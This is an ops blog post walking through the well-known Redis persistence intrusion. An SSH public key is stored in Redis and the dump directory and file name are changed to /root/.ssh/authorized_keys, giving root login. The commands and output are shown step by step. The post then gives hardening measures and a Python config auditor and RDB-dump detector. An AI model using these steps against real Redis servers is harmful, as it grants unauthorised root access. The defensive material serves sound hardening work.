nginxs

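Ops Blog

An intrusion via Redis persistence

2016/02/19 21:54 in Security 2

This relies on the fact that Redis persistence writes a file to disk, and on the bug that Redis lets you specify both the location and the name of that file. If your Redis happens to contain only one key, that key is an SSH public key, and the persistence file name is set to "authorized_keys" with the location "/root/.ssh/", then whoever holds the matching private key can log in as root without a password.

1. Generate the key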

[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n") >/tmp/foo.txt
[root@saltstack-node2~]# cat /tmp/foo.txt

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ== root@xxx.example.com
\n\n

2. Flush Redis

127.0.0.1:6379> FLUSHALL
OK

3. Write a key

[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn
OK

4. Change the configuration of the known Redis instance

127.0.0.1:6379> CONFIG set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit

5. Login now works

[root@saltstack-node2~]# ssh 192.168.81.129
The authenticity of host '192.168.81.129 (192.168.81.129)' can't be established.
RSA key fingerprint is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.81.129' (RSA) to the list of known hosts.
Last login: Wed Nov 11 03:18:23 2015 from 192.168.81.1
[root@saltstack-node2~]#

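Preventive measures:
1. Do not start Redis as root or as any other user that can log in (start it with low privileges).

2. Change the configuration to add password authentication
requirepass password

3. Bind to an internal IP so Redis is not reachable from outside
bind 192.168.0.5

4. Remove the Redis commands that can be used to break into the system

rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command EVAL ""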
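
An added example, not from the original post: a Python audit of a redis.conf against measures 2 to 4 above, plus a check that recognises an authorized_keys file that is really a Redis RDB dump (RDB files begin with the magic "REDIS" followed by four version digits). The function names and the sample inputs are constructed for illustration.

```python
import shlex

RISKY = ("FLUSHALL", "FLUSHDB", "CONFIG", "EVAL")  # commands named in measure 4

def parse_conf(text):
    """Parse redis.conf text into (directive, [args]) pairs."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)  # handles quoted values such as ""
            entries.append((parts[0].lower(), parts[1:]))
    return entries

def audit_conf(text):
    """Return sorted findings for measures 2-4 (measure 1 is not in the file)."""
    entries = parse_conf(text)
    findings = []
    if not any(d == "requirepass" and a and a[0] for d, a in entries):
        findings.append("no-requirepass")
    binds = [addr for d, a in entries if d == "bind" for addr in a]
    if not binds or any(b.lstrip("-") in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind-all-interfaces")
    renamed = {a[0].upper() for d, a in entries
               if d == "rename-command" and len(a) == 2}
    findings += ["enabled:" + c for c in RISKY if c not in renamed]
    return sorted(findings)

def is_rdb_dump(data):
    """True if data starts with the RDB magic: b'REDIS' plus 4 version digits."""
    return len(data) >= 9 and data[:5] == b"REDIS" and data[5:9].isdigit()

# Constructed sample inputs (not taken from a real host).
WEAK_CONF = "port 6379\ndir /var/lib/redis\n"
HARDENED_CONF = """
bind 192.168.0.5
requirepass password
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command EVAL ""
"""
SAMPLE_DUMP = b"REDIS0006\xfe\x00" + b"\n\nssh-rsa AAAA-constructed root@example\n\n"

if __name__ == "__main__":
    print(audit_conf(WEAK_CONF))
    print(audit_conf(HARDENED_CONF))
    print(is_rdb_dump(SAMPLE_DUMP))
```

To use it on a host, pass the contents of the real redis.conf to audit_conf and the first bytes of each authorized_keys file to is_rdb_dump.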

[Ops Blog]
An intrusion via Redis persistence http://new.nginxs.net/read.php/hello-world/
